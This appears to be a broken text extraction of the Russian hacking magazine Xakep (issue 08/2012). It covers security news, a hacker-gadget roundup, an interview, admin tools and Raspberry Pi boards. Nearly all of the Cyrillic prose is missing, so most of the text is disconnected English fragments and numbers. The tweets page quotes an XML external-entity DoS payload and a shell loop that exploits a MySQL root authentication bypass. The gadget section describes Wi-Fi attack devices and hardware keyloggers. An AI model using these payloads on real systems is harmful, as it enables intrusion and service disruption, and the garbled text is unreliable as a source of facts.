Вы находитесь на странице: 1из 148

026

WWW.XAKEP.RU

08 (163) 2012

-:

- 35 $

: 230 .

018

14 ,

054

059

114

PHP



LINUX MINT?

, 2012. .

, ,
. Kaspersky Internet Security.
www.kaspersky.ru

step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)


PC_ZONE UNITS

UNIXOID SYN/ACK
MALWARE

PR-

step (step@real.xakep.ru)
(goltsev@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)

(vagizova@glc.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-

(alik@glc.ru)



(bessonovart.ru)

PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906



-


, ,
(,
), , ,
. -
, - ,
- .. . ( )
- .
, , LinkedIn
Last.fm. SHA1 , MD5 (,
plaintext). , , GPU ,
.

7080 .
, -
!
, - . , ,
?
,
, , , .
. bcrypt PBKDF2 c .
.

gorl,
. .

P. S. 11 Intro .
, .
;).


.: (495) 935-7034, : (495) 545-0906




TECHNOLOGY

CORPORATE
-

(zinaidach@glc.ru)
(filatova@glc.ru)
(polikarpova@glc.ru)
(melnikova@glc.ru)
(kachurin@glc.ru)
( )
(tatarenkova@glc.ru)
(bulanova@glc.ru)

(korenfeld@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)

:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002.
Scanweb, . 218 500 .
.
. ,
, . .
.

: content@glc.ru.
, , 2012

Content
012

HEADER
004
011

MEGANEWS

hacker tweets
-

016
017

,

NFC,
ANDROID.
.



Proof-of-concept

COVERSTORY

026


, ][

COVERSTORY

018

14

038

114

PCZONE
032

038


15
Windows-,

- -
Raspberry Pi, Cotton Candy, CuBox,
PandaBoard, Trim-Slice AllWinner A10

044
050
054
059
064

068

Easy-Hack





PHP
PHP

PHP
-
X-Tools
7

102

UNIXOID
108

114
120

124

128

078

138

140

090

096

098

Windows Phone 7.5






2814789

,


:
?

Be quick or be dead

SATA 3.0
, , Z77 !
GIGABYTE G1.Sniper 3

084





NetFlow

FERRUM
132


, ?
, !
Flamer


Linux
3.0 3.4

Linux Mint 13 Maya

,
Ubuntu Linux 8-

SYN/ACK

MALWARE
070

Highload. 2

143
144

FAQ UNITED
FAQ

8,5
WWW2
web-

MEGANEWS

BIOS


40%,

.

GOOGLE CODE JAM



Mebromi,
BIOS (Award BIOS), . CBROM
BIOS.
BIOS
(MBR) ,
winlogon.exe winnt.exe Windows XP 2000/2003
.
MBR
. ,
BIOS. Mebromi
!
Award BIOS, MBR.
McAfee ,
Niwa!mem.
, Mebromi, MBR
DLL, cbrom.
exe Award BIOS. :
, BIOS
.

:
Niwa!mem

,
Mebromi,


.


Angry Birds
,
.

004

PAYPAL .
XSS, CSRF, SQL
injection
.

Google Code Jam ,


: Google 2003 .

( Google, - :)). ,
.
,
. Google Code Jam 2012,
500 .
25 ,
- . ,

, :
EgorKulikov, eatmore, andrewzta, Burunduk1, vepifanov Dlougach.

Vasyl sdya. () 27 , - Google.



.

35 000 , 76 000 (
rookee.ru).

MICROSOFT
HTC ,

ARM-
Windows 8.
.

23 100


Google.
Google.

08 /163/ 2012

MEGANEWS

HDD : 9,6 .

SIRI

SIRI

Kaspersky Lab

3,5
2,5 ,

.
IPAT

.

,
,
.
Siri,
iPhone
iPad. ,
Siri Apple, . . -,
Apple ,
.
-,
,
,
,
. ,
,

.
. ,
Apple , .
Apple ,
, Apple
Siri
.
, , ,
, (Prem Natarajan), -
Raytheon BBN Technologies (),
-

. , Apple

,
. ,
, Apple ,
CPU .
Apple ,

,
Siri, -, GPS , .

,
. (eugene.kaspersky.ru/2012/06/26/kill-the-troll),
, . : IPAT
. IPAT .
2008 34 , Symantec, Sophos, McAfee,
F-Secure, CA, Trend Micro, Novell, Eset, Microsoft .
,
. 5,311,591
5,412,717 90- , IPAT.
, ,
.
IPAT .
WITH PREJUDICE, IPAT
! . ,
:).

APPLE MAC OS X

MAC OS
,
MAC OS X
, DOESNT
GET PC VIRUSES
006

08 /163/ 2012

MEGANEWS

MCAFEE: 83% .

GOOGLE



,
Crypto-Gram , , Vupen, Netragard .
: Forbs
,
- ( ). Forbs,
, 250 .
, , ,
. 2010 .
, ,
,
.
. Microsoft, Google
,
.

. ,
, :
.

Guardian,

.
: ,
;
Facebook Apple, ;
.
, ,
, ,

Skype. Google
:

. , ,
/ , , SMS
, ,
, URL Google.

,
Google



( ).



,


MD5CRYPT -
,

.

LinkedIn, eHarmony
Last.fm.
( 50 )
-
,
, SHA.

008

FACEBOOK
,
,
The New York
Times.


DO
NOT TRACK,
: Microsoft ,
IE 10 DNT
.

08 /163/ 2012

MEGANEWS

57% , Business Software Alliance.

WINDOWS 8 SECURE BOOT


LINUX
,
Linux
,
(Secure Boot) Windows 8
UEFI. ,
, Windows 8, Secure Boot
,

Microsoft OEM- . Secure Boot, ,
,

.
, UEFI
, . Microsoft Open Source ,
, ,
.
, Fedora Red Hat
Microsoft, , Windows 8.
, .
,
. ZDNet ,
.
UEFI-, Verisign 99 .
, :
UEFI,
,
. Fedora
99 ,
. Linux ,
, Linux-
Microsoft, Fedora ,
.
:

Linux. , , ,
, ,
, -
. ,
,
() . ,
, .
, Windows 8 UEFI
:
, , ,
,
(
?)
, .

Unified Extensible Firmware


Interface (UEFI)
,

. BIOS,

.

POSITIVE HACK DAYS 2012



IPHONE
4S, 0-DAY
WINDOWS XP

FREEBSD
010

08 /163/ 2012

#hacker tweets
@mihi42:

<!ENTITY % a SYSTEM 'http://


www.w3.org/QA/TheMatrix.
xml'><!ENTITY b '%a;'> #java
#jaxp #DoS CVE-2012-1724 https://t.co/
PguomymA @Agarri_FR
:

. ,
Java 7 Update 5 6 Update 33
.

@cBekrar:

MS
500 000 ,
#BlueHatPrize anti-ROP,
,
.

@0xcharlie:

@andreybelenko:

,
: t.co/2SGIJ8oU.

,
ASLR iOS 6.

-
.
?

@sanjar_satsura:

... ,
,
Flame,
. ][
:

][! !
:)

@hdmoore:

: $ for i in `seq 1
512`; do echo 'select @@version;'
| mysql -h 127.0.0.1 -u root mysql
--password=X 2>/dev/null && break; done
:

, .
MySQL
memcmp(). MySQL. goo.gl/EtbCO.

Microsoft
BlueHatPrize. , 250 000 ,

.

: ,
DCIM
? DCIM :
Digital Camera IMages.

@esizkur:

,
PaX
: BlueHat
.
:


BlueHatPrize.

@crypt0ad:

@mikko:

, calc.exe,
,
.

@homakov:
@justinelze:

,


alert(test)
.

,
CSRF-
, PHP.
, CSRF- .
#php

@opexxx:
@taosecurity:


, ,
Microsoft , Huawei.
Reverse mirroring;
.

08 /163/ 2012

@DEVOPS_BORAT:

,

, .

select * from LastFm where


hash=md5('yourpassword')
:

: LinkedIn,
Last.fm ...

011

MEGANEWS

100 000 WINDOWS PHONE MARKETPLACE, Microsoft.

-
SMARTKEY TV

NFC

ANDROID- ,

LiquidTv. ,
SmartKey TV , -
Android 4.0 Ice Cream Sandwich, ,
HDMI-
. ,
Cortex A9 1
Mali-400 ARM, Full
HD 1080p, 512 , 4 -,
Wi-Fi, microSDHC miniUSB. SmartKey TV
DLNA ,
. Google Play
. Skype, , ,
, .
, .


. Android-.

SmartKey TV 99 120
QWERTY- .

VOLVO


.

200 .

012

GOOGLE ICANN

50 ,
.google, .youtube
.lol.

:).

55
, :
7,5
6,3 ,
.

ymantec Android,
, NFC. ,
NFC
.
. ,

. . , NFC,
Android.Ecardgrabber.
, ,
. .

NFC. Google Play 13 ,
100 500 .
.
,
: MasterCard
GeldKarte.

MOZILLA


Mozilla Marketplace, .
200
.

NOKIA
;
10 000
(20% ),

Vertu.

08 /163/ 2012

DROPBOX , .


IVY BRIDGE

IPV6

INTEL ULV-


Ivy Bridge
110
.

,


.

IPv6,
6 2012 , .

IPv4, 3,7 .
- 6 IPv6. ,
IP-
, . IPv4,
, ,
. IPv6 ,

-. Google, Yahoo Facebook
,
IPv6, IPv4.
IPv6 Google, Yahoo, Microsoft,
Facebook, Cisco, Akamai Limelight.
-
- - .
, IPv6
, Comcast AT&T ,
France Telecom , XS4ALL . , Cisco Linksys, D-Link ,

IPv6.
IPv6 . , ,
- ARIN, :
, IPv4 IPv6, -
, .
,
, ,
. , ,
, ,
, :).

Intel Ivy Bridge, ,


. Intel
Ivy Bridge. ,
.
U. Core i5 Core i7 (31 ).
Core i3 . Ivy
Bridge 22- .
, (Sandy Bridge),
.
Intel, ,
. , USB
3.0 Thunderbolt
. , . , ,
, ,
.

FLAME

,
,

08 /163/ 2012

013

MEGANEWS

1 246 713 URL 24 129 Google .


LINKEDIN

6 458 020 LinkedIn 1,5 MD5-


eHarmony forum.
insidepro.com. LinkedIn
, , ( ).
LinkedIn ,
SHA-1 ( ) LinkedIn. , ,
.
, , ,
. LinkedIn ,
, . ,
-
LinkedIn. 1,5 MD5-
eHarmony, ,
95% .

236 578
Polimo

,
.

Raspberry Pi
Raspberry Pi Foundation 2011 , .
, 2535 . ,
?
, , . -,
, Raspberry Pi
. -, ,
, Wi-Fi-
USB, Linux ?
PwnPi
(pwnpi.sourceforge.net) Raspberry Pi,
. ,
,
,
.
,
Raspberry Pi Parrot DF3120 25 . 3,5
Bluetooth. , , ,
.

(Millennium Technology Prize


2012) Linux.


.


,
.

600 .

014


(29%
) (10%),

Superjob.ru.

IPHONE IPAD


, ,
,
Bay.ru.

08 /163/ 2012

NOKIA , Nokia AIR.

MICROSOFT
SURFACE
,

Microsoft

Surface
.

.

,
, . Microsoft
Windows- Surface,
.
Surface Windows
RT Windows 8 Pro ( ).
10- -,
- Touch Cover,
3 .
, ( SmartCover iPad). ,
, Apple.
Type Cover,
, , . , Type Cover
, .
.
,
Windows RT Windows 8 Pro, . , NVIDIA Tegra,
microSD, USB 2.0, Micro HD Video,
676 9,3 .
Intel Core i5 (Ivy Bridge),
microSDXC, USB 3.0, Mini DisplayPort 903 13,5 . -

10 , 6 .
VaporMg,
. , .
Gorilla Corning Glass.
,
3G/4G? , . ,
Wi-Fi .
,
, Windows RT ( NVIDIA Tegra 3)
499599 ,
Intel Ivy Bridge Windows 8 Pro - 999 . Microsoft , ARM-
( Surface Windows RT) (
Surface Windows 8 Pro), .
, ,
Surface Windows RT, - Microsoft. ,
OEM-
2013 Windows RT ,
. Surface, , .
.


-
USB-,

91 1,95 .

08 /163/ 2012

015

HEADER


Mockingbird




,
, .
-
. , ,
: .
,
, -
, :

, .

. ,
,
, .

, .
.
, , ,
.
. ,
dragndrop ,
, , .

.
:
?
,
,

016

Balsamiq Mockups (www.balsamiq.com). Adobe AIR


. .

(, , ), , .
mockingbird (gomockingbird.
com). ,

-
. :

UI,
, ,

( :
).
, , .
,
,
.
mockignbird ,

,
, .
InPreso Screens (www.inpreso.com).

( ?!),

.
, ,
Windows 7 Mac OS X. ,

.

, ,
. , : iOS
Android. proto.io, .

,
. ,
iPhone
,
.
.
. ,
usability, , .
, ,

, . z

08 /163/ 2012

(alizar@gmail.com)

Proof-of-Concept


HTTP , .
,
.
, .
, Wi-Fi-- ( Firesheep DroidSheep).
- , .
HTTPS, . ,
:
- , XSS, XST , HTTPS
.
, , .
: ,

? One Time
Cookies, OTC (www.cc.gatech.edu/~idacosta/otc/index.html). , OTC
.


, HTTPS-, HMAC (Hash-based Message
Authentication Code) ,
, . OTC. ,
( )
,
.
, HMAC
. , ,
HMAC.

,
, ( ).
OTC
, , . , , .
OTC
HTTPS.


uid, pwd:
ks, ns: ,
kw: -
ts, th:
url:
data: POST
v: OTC

OTC

08 /163/ 2012

cid: (credentials) OTC


domain, path: OTC
E(k, x): x k
HMAC(x): -
x
X-OTC: HTTP
OTC

OTC, ,
. WordPress (www.
cc.gatech.edu/~idacosta/otc/otc_wp_plugin.zip),
Firefox (www.cc.gatech.edu/~idacosta/otc/
otc.xpi).
, ,
,
Wireshark Live HTTP Headers Firefox. z

017

COVERSTORY

14

, ,
,
.
(The Art of Intrusion)
,

. ,
.

( ).
Wi-Fi. ,
, - .
,
.

018


007.

. ? .

08 /163/ 2012

WiFi Pineapple Mark IV


wifipineapple.com

,
, - , , ,
: ?
, - , ( ,
) MITM-,
, .

Wi-Fi Guest .
- (Rogue AP) .

, .
WiFi Pineapple, 2008 ,
.
.
, (
Atheros AR9331 SoC 400 ), ,
OpenWRT , , Karma, DNS Spoof, SSL Strip, URL Snarf,
ngrep . , ,
( -)
.
,
(
Battery Pack), - , .

99,99

Ubertooth One
ubertooth.sourceforge.net

119,99

Wi-Fi,
, Bluetooth .
, ShmooCon 2011 ( youtu.be/KSd_1FE6z4Y),
Ubertooth (ubertooth.sourceforge.net).
. BT-
, 10 000 .
, ,
. , USB-
, ARM
Cortex-M3. ,
promiscuous,
Bluetooth-,
. , ,
, , . Ubertooth One Bluetooth-,
Kismet (kismetwireless.net).
, ,
.

08 /163/ 2012

019

COVERSTORY

ALFA USB WiFi AWUS036NHA


bit.ly/OokY6l

,
, ,
Wi-Fi-,
. , , , , :). ,
.
, ,
.
ALFA USB WiFi AWUS036NHA. Wi-Fi USB-
Alfa AWUS036NHA,
Atheros AR9271 b/g/n ( 150 /).

, -
BackTrack 5, . , USB-
, ( Backtrack),
USB-.
Pineapple Mark IV.
2.2.0 Pineapple
deauth-. : ,
. WPA handshake,
WPA-.

99,99

020

35,99

Reaver Pro
bit.ly/IRrZfF

,
WPA- .
,
WPS.
][_03_2012,
Reaver (code.google.com/p/reaver-wps). , .
. WPS pin,
, WPA-. , , . Reaver
4 10 WPS pin. , ,
, ,

. WPA-,
( handshake),
WPS .
:
, .
Reaver Pro
WiFi Pineapple Mark IV ( ). ,
Reaver Pro, , .

08 /163/ 2012

16dBi Yagi Antenna


bit.ly/MXT1Tv

. .
-
.
. ( omni), .
16dBi Yagi Antenna.


RP-SMA
.
iFi Pineapple,
ALFA AWUS036H, WiFi
. ,
Ubertooth One, Wi-Fi-.
.
,


,
(, ).

30

69,99

08 /163/ 2012

USB Rubber Ducky


usbrubberducky.com

USB, Teensy.
, HID- () , , , ,
(, ).
USB Rubber Ducky Teensy. 60 32- AVR- AT32UC3B1256,
- . Duckyscript ( bat-),
. , Wi-Fi-, reverse ,
. microSD-,
.
, ,
, .
, , , .

021

COVERSTORY

7
8
Throwing Star LAN Tap
bit.ly/LYOW2f

- , : , ,
.
.
, ,
, .
? Throwing Star LAN Tap
, Ethernet-. ,
( ), .
Throwing Star LAN Tap.
J1 J2, J3 J4
. , J3 J4
, , , ( ). Throwing
Star LAN Tap 10BaseT
100BaseTX
. , 1000BaseT.
,
( 100BaseTX),
. ,
( Open Source hardware).

14,99

100

GSM/GPS/Wi-Fi-
www.google.com

,
, jammer , -,
. - , .
, , ,
.
(GSM),
, , , GPS-,

. ,
, .
( )
, , , .
,
-.
,
.
, ( !), ,
,
.

022

08 /163/ 2012

RFID 13.56MHz Mifare


-
bit.ly/MQlw6e

,
.
Mifare Classic 1K.
, () , , .
0,5, 1 4 , 16 .
( ). Mifare 10 ,
100 000. ,
. ,
, .
,
, .
: , , :).
bit.ly/MQlw6e,
65 . ,
,
. , ,
, Mifare Ultralight. ,
, NFC, ZigBee .
NFC, , RFID,
.

10
149,99

08 /163/ 2012

65

KeyGrabber
www.keelog.com

- ,
.
:
. ,
,
KeyGrabber, PS/2,
USB-. ,
.
, , . ,
,
Wi-Fi-,

e-mail.
. , , KeyGrabber
Module ,
PS/2- USB-.
VideoGhost , , (2 ).
DVI-, HDMI-, VGA-,
149,99 .

023

COVERSTORY

MiniPwner

www.minipwner.com

11

,
,
. MiniPwner ,

/
.
,

- .
.
SSH- . ,
TP-Link TL-WR703N,
4 ,
802.11n Ethernet-. OpenWrt,
,
: Nmap, Tcpdump,
Netcat, aircrack kismet, perl, openvpn, dsniff, nbtscan, snort,
samba2-client, elinks, yafc, openssh-sftp-client .
, , 1700 ,
,
. ,
, , .

99

Pwn Plug

pwnieexpress.com

12
595

024

MiniPwner, Pwn Plug


drop-box-
,
/. ,
.
, Pwn Plug
.
,
Debian 6, , , .
Elite- . , : 3G, Wireless USB-Ethernet.
SSH 3G/GSM
. , Text-to-Bash:

SMS-. HTTP-, SSH-VPN OpenVPN.
Metasploit,
SET, Fast-Track, w3af, Kismet, Aircrack, SSLstrip, nmap, Hydra, dsniff,
Scapy, Ettercap, Bluetooth/VoIP/IPv6
.
16- SDHC-. Wireless- 3G
USB-Ethernet , ,
.
. , , ,
, .

08 /163/ 2012

AR.Drone

ardrone.parrot.com
.
, ,
... ! -.
,
. , AR.Drone ,
.
: .
AR.Drone ,
, , , , , .
:
,
. :
iPhone, iPad Android, . ,
. ,
, . ,
: bit.ly/GVCflk
, ; bit.ly/o8pLgk ,
; bit.ly/fhWsjo
, , .

14
08 /163/ 2012

299

13

Raspberry Pi
25

raspberrypi.org

Raspberry Pi,
. , Raspberry Pi
Foundation. ARM 11
700 M
.
, ,
. /, USB 2.0,
SD/MMC/SDIO, Ethernet-,
HDMI-. ,
drop-box. ,
, ,
Wi-Fi- USB Linux . Linux- Debian, Fedora, Ubuntu,
PwnPi (pwnpi.sourceforge.net),
Raspberry Pi.
.
I2P, Metasploit,
.

025

COVERSTORY


][

: ,
, ,
. ,
, ,
.
, ,


,
.

026


, ,
Endeavor Security. 800 . ,
: endeavorsecurity.blogspot.com.
, .
, ,
, ,
. . ,

, .
.
, . , , c
XSS. , , . -
!

. , , , , .
-.

08 /163/ 2012



, , .

,
,
13

,
.



2010 .

08 /163/ 2012

027

COVERSTORY

2008 ,
, ,
. Macrovision
- ,
.
Endeavor Security.
:
,
.
,
, ,
.
: , ,
? - .
,
: , - ,
,
.
. ,
! ,
.
, -, . ,
, , .
,
. ,
C
C++ .
void,
. : ,
? , , ,
. ,
.
:
? ,
C define.

,
. ( C89)
,
, .
, ,
, , , , ,
. ,
15
!
crack me
,
. : .
, .
crack me ,
,
, .
?
, ,
?

028

,

, .
,
300 000 , :
.
-
- 150200 , 300 . .
Endeavor Security,
- .
.
, ,
, ,
. : 300
, .
, , 3000 ,
300 ?! :) ,
, 170 .
Endeavor,

. ,
Endeavor McAfee,

.
, :
300 Cryptograph Research
-
170 . , ,
.
,
, , . ,
,

.

.
,
.
:
,
. !
? !
,
, . , -
. Endeavor
,
, . ,

, :). ,
.
-! ,
.

Panda Security , . -,

,
, revenue 5%. ,
IT-.
( 75
) ,
. .
, c Codegate 2009.
Soft Forum
, -

08 /163/ 2012

.
, - : HR-,
,
, ,

- .
, .
: ,
, . , -
.
, .
,
. : L-1
( ) O-1
.

. L-1,
McAfee,
. O-1 :
, . :
, .
,
, . , ,
.
, ,
,
.
,
, , .
, , ,
. : ,
,
. ,
,
L-1.

. -,
, , , ,
. ,
,
.
, ,
.
, ,

. ? ,

, .
-,
-, ,
, , , ,
. ,
.

08 /163/ 2012


,
: British
Airways, , . .
,
. . ,
:).
-
.
, -
. ? :
. .
: ,
,
.
, -,
!
.
IAD. ,
,
,
, ,
.
McAfee
. (
) ,
. -
-,
,
.
:
, ,
.
.
:
,
. !


Senior Malware Researcher. ,

.
,
. .

: NOT CITIZEN.

, ,
. .
,
. .
, . ,
.
, ,
.

. !
2009
McAfee!
Operation Aurora. ,
.
- , 40 000 ,
. ,
.
.
, -,
.
, . ,
. ,
.
, ,

? , .
, Linux vim
! , ,
. ,
, , ,
.
,
.
, . , , , ,
,
.
.
, :
, , , , , ,
, .
, QNX . .
, .
,
.

2009
MCAFEE!
OPERATION AURORA.
,
029

COVERSTORY

.
, , ,
, .
,
.
.

.
, ,
, ,

.
, . .
,
.
,
. ,
- .
: 100 ,
, 10 000 ,
,
.


, , , .
: , ,
,
.
,
. , , ,
.
.

? ,
. !
, .
,
- , .
! , ,
. ,

.
, .
:
, .
, . !

.
,
. :
,

. .
? !
, .
- , ,

030

,
, .
- ,
, - .
: ,
, ,
,
.
: ,

.
,
, K?.
.
:
. .
, .
, Endeavor
Security,
.
,
, .
-, , . ,
,
.



. Intel, Oracle, Microsoft, Google,
Symantec . -
.

Endeavour Security
. ,
. , , .
- -

. . ,
.
.
,
-. ,

, .
,
.

,
, ,
. ,
. ,
,

.
, . ,

- . ,
, . ,
.
,

, .
,
15
- --
,
.
.
,
.
: ,
.

.
, !
, !
. -,
. . ,
SSN
- - . SSN
. , ,
. ,
.
. ,

,
SSN. ,

.
.

, .
,
. ,
SSN!


-. !
,
, , .
? .
, . !

,
. ,
, .
.
.
, ,
,
.

. z

08 /163/ 2012

Preview

37 .
.

PC ZONE
38

- -
35 ? , 2012 , !
-
,
.
Raspberry Pi ,
.

. :
,
USB-,
:

. , .

PC ZONE

32


15
Windows-,
.
.

64


, PHP
.

08 /163/ 2012

54



,
.
.

59

PHP

PHP.
.

MALWARE

70


,
. .

78

, !

Flamer

.

031

PC ZONE

urban.prankster (martin@synack.ru)

15
WINDOWS-,




,

,
,

.
,

,

.

032

08 /163/ 2012

ADVANCED IP SCANNER
, , .
Advanced IP Scanner (radmin.ru/products/ipscanner),
. AIPS , . .
AIPS IP- ,
,
IP ; IP ,
.
.
: MAC-,
, , ,
( , HTTP, HTTPS
FTP). ,
( , HTTP, HTTPS FTP).
,
. AIPS
Radmin Radmin Server. (XML, HTML CSV)
( drag-and-drop). , ,
.
Wake-on-LAN, ,
.

NETWRIX INACTIVE USERS TRACKER


NetWrix,
IT-,
(goo.gl/sfQGX),
Windows. ,
NetWrix Inactive Users Tracker (goo.gl/jWEj9)

, -
( , , , ).
IT- ,
.
,
. Free

e-mail ( SMTP), ,
. :
, OU, OU . PowerShell- get-NCInactiveUsers,
( lastLogon) .

(, , ) ;
; ; ;
; /; ;
(uptime, , ).
. ,
,
(avi, mp3 ).
-,
(txt, XML, CSV, PDF)
( , :
MS SQL, MS Access, MySQL, Oracle ), e-mail
.

CHECKCFG

. ,
CheckCfg
(checkcfg.narod.ru).
, , CPU, ,
, S.M.A.R.T. . CheckCfg
. ,
.
, RTF.
CheckCfg .
CheckCfg,
.

Sklad, ,
CheckCfg, , . Sklad_w
( IP-, CPU, Memory,
).
Doberman.
, ,
,

.

MAILARCHIVA OPEN SOURCE EDITION


, MS Exchange,
,
, .
.

WINAUDIT FREEWARE
WinAudit Parmavex Services
(pxserver.com/WinAudit.htm),
. ,
. ,
Windows, 64-.
( ), 30 (
). ,
,
;

08 /163/ 2012

Advanced IP Scanner ,

033

PC ZONE

WinAudit ,

MailArchiva
(mailarchiva.com), (Lotus Domino, MS Exchange, MDaemon, Postfix, Zimbra,
Sendmail, Scalix, Google Apps).
SMTP, IMAP/POP3, WebDAV ilter (
SMTP- Milter-, IMAP/POP-).
, .
( ), (
) ( , ). Open
Source MailArchiva (openmailarchiva.sf.net) ,
(Word, PowerPoint, Excel, OpenOffice, PDF, RTF, ZIP, tar, gz).
MailArchiva Windows, Linux, FreeBSD Mac OS X.

PERFORMANCE ANALYSIS OF LOGS



Windows Performance Monitor,
, . ,

, .
PAL (Performance Analysis of Logs, pal.codeplex.com) .

. MS IIS, MOSS, SQL Server, BizTalk,
Exchange, Active Directory .
PAL Wizard ,
,
( CPU ),
. HTML XML, ,
(Min, Avg, Max Hourly Trend).
.
.
PAL ,
, .
PowerShell PAL.ps1,
. XML-;
, .
PAL Editor.
Win7,
MS, WinXP (32/64).

034

, PAL,

PowerShell v2.0+, MS .NET Framework 3.5SP1 MS Chart Controls for


Microsoft .NET Framework 3.5.

VIRTUAL ROUTER
, Wi-Fi- , . ,
WLAN Wi-Fi.
: , , . Win7/2k8 ( Win7
Starter Edition)
( Virtual Wi-Fi), Wi-Fi-
Wi-Fi-.
Wi-Fi (SAPoint, Software Access Point).
- WPA2.
Win7/2k8R2
Netsh,
,
Virtual Router (virtualrouter.codeplex.com), GUI .
Virtual Router SSD
, . -
. ,
.

RDC- RDCMAN
,
Windows, Remote
Desktop Connection.
RDP- ,
.
Remote Desktop Connection
Manager (RDCMan, goo.gl/QHNfQ), .
RDP-,

. , ,
, .
(, , , ),

08 /163/ 2012

. .
,
, .
. ,
, , . , ,
Connect.
.

Management. , Empty Password User Report ,


GetDuplicates ,
CSVGenerator CSV- Active
Directory. :
, AD ,
SharePoint,
, ,
,
, ( CPU, ,
, ), .

FREE ACTIVE DIRECTORY TOOLS


Active Directory
.
Free Active Directory Tools (goo.gl/g11zU),
ManageEngine.
, .
: AD USer Report, SharePoint Report,
User Management, Domain and DC Info, Diagnostic Tools Session

COMODO TIME MACHINE



System Restore Windows, , , , ,
. Comodo
Time Machine (comodo.com)
.
, . CTM
( ),
, ,
.
System Restore,
.
, .
, .
CTM ;
, <Home>.
,
, .
, , -,
.
,
. ,
.

AMANDA
, Windows
*nix, AMANDA (Advanced Maryland
Automatic Network Disk Archiver, amanda.org). ,

(vtapes),
CD/DVD. AMANDA
unix- dump/restore, GNU
tar , -

, NetWrix Inactive
Users Tracker

08 /163/ 2012

,
POWERSHELL

,


035

PC ZONE

Free Active Directory Tools 13


AD


. - . :
Kerberos 4/5, OpenSSH, rsh, bsdtcp, bsdudp Samba.
Windows-
, , Samba. (GPG amcrypt)
,
.
,
, .

CORE CONFIGURATOR 2.0 FOR SERVER CORE


, Win2k8/R2 Server Core,
. ,
R2 SCONFIG.cmd,
. odeplex
Core Configurator
(coreconfig.codeplex.com).
NetFx2-ServerCore, NetFx2-ServerCore PowerShell.
Start_CoreConfig.wsf ,
, , : , ,
, ,
RDP-, ,
Windows Firewall, / WinRM, , ,
, , Hyper-V DCPROMO.
Load at Windows startup,
.

EXCHANGE 2010 RBAC MANAGER


Exchange 2010 ,


.
PowerShell
. Exchange 2010 RBAC Manager (RBAC
Editor GUI, rbac.codeplex.com), .
.

036

Virtual Router,

C# PowerShell.
Exchange 2010 Management Tools.

POWERGUI
, PowerShell , ,
.
PowerShell Microsoft , .
PowerGUI (powergui.org), PowerShell-.
.

MULTI-TABBED PUTTY
PuTTY
,
SSH, Telnet rlogin. ,
.
.
Multi-Tabbed PuTTY (ttyplus.com/multi-tabbed-putty),
.

: ,

, . z
WWW

INFO

codeplex.com



.

Virtual Router
onnectify
(connectify.me),
Lite-

,

.

mhotspot
(mhotspot.com).


Amanda
Server
Windows: goo.gl/zyNzd.


Comodo Time Machine

EaseUS Todo Backup
Free (goo.gl/uifWC).
PuTTY

Windows,

Unix.

08 /163/ 2012

PC ZONE

(dhsilabs@mail.ru)


,


.


USB-.
038


RASPBERRY PI,
COTTON CANDY, CUBOX,
PANDABOARD, TRIM-SLICE
ALLWINNER A10

-
?
.
, -.
? :) , 1960-
DEC PDP-1, , .
- .
- , USB-.
, ( ,
?)
,
,

.

, , , -
. ,
- ARM-,
, . -
Android, (
,
) Linux. ,
Linux , .


HD-. HDMI-
.
DVI-, ( HDMI-).
, /
HDMI-. . :
( ),
HDMI-, . ,
, ,
.
-.
. USB, , USB-.
USB-
USB-: ,
, .
: USB-:
, .
, ,
Wi-Fi, Ethernet.

08 /163/ 2012

- -

RASPBERRY PI


RASPBERRY PI
Raspberry Pi . ,
,
. , Hexxeh,
. ,
,
.
, rpi-update
:
wget http://goo.gl/1BOfJ -O /usr/bin/
rpi-update && chmod +x /usr/bin/rpi-update
sudo apt-get install ca-certificates

rpi-update root:
sudo rpi-update

-

.
Raspberry Pi, ,
USB-

2011 .
-
, 12
.
, -
, , ,
.
, ,
?
20% ,
, .

, :
, .


Raspberry
Pi B. Broadcom
BCM2835 ( ARM11)
700
256 , ( package-on-package).
BCM2835 OpenGL ES 2.0,
FullHD-.


.
USB- (
, B )

08 /163/ 2012

Ethernet- B.

RCA
HDMI.
SD, MMC SDIO.
SD-.

,
, , . ,
, .

? : -
Debian
Fedora. Linux . ,
Raspberry Pi, 19
,
Debian 6.0, LXDE,
Midori. , -

,
ARM.

,
https://github.
com/Hexxeh/rpi-firmware. rpiupdate :
FW_REPO="git://github.com/Hexxeh/
rpi-firmware.git"
. github.com/Hexxeh/
rpi-firmware.git,
https://github.
com/Hexxeh/rpi-firmware, .
.
SKIP_KERNEL .
SKIP_KERNEL=1,
Raspberry Pi , .
ROOT_PATH/BOOT_PATH -,
SD-.
:
SKIP_KERNEL=1 rpi-update
ROOT_PATH=/media/root BOOT_PATH=/media/
boot rpi-update

35$
farnell.com/raspberrypi

039

PC ZONE

CUBOX

99$
solid-run.com/store

FXI
COTTON
CANDY

199$
store.cstick.com

- . Raspberry Pi
, FXI .
( ),
- CuBox. CuBox
(222 ) 91 .

, , ,
ARM- Marvell Armada 510 ARMv7 800 . 1 , Vivante GC600 GPU, OpenGL 3.0 and OpenGL ES 2.0 2D/3D-.
HD- (Marvell vMeta HD Video Decoder).
, ,
1080p KDE
GNOME Linux. 3 !

Ubuntu
Desktop 10.04 ( Linux
2.6.x) Android 2.2.x ( ).
SD-,
. SD-, ,
2 , ,
Ubuntu Android ( ).


FXI Cotton Candy ( FXI Technologies)
HDMI.
Cotton Candy Samsung Exynos
4210 1,2 (
ARM), 1
Mali-400 MP.
microSD (
64 ).
B
Ethernet-, Cotton Candy
Wi-Fi 802.11b/g/n
Bluetooth 2.1.

Cotton Candy Android 4.0 Ice Cream


Sandwich,
, ARM,
Linux.







. ,

.

CUBOX: DBUS UBUNTU


CuBox Android Ubuntu
10.04 LTS. , Ubuntu
. CuBox .
Ubuntu,
CuBox,

040

DBUS.
HDMI,
,
NetworkManager asoc: CS42L51
<-> mv88fx-i2s1 No matching rates.

CuBox , .
DBUS:
sudo apt-get --reinstall install dbus

08 /163/ 2012

- -

PANDABOARD

UBUNTU PANDABOARD
, PandaBoard Linux
Android. , , Ubuntu.
. PandaBoard OMAP4,
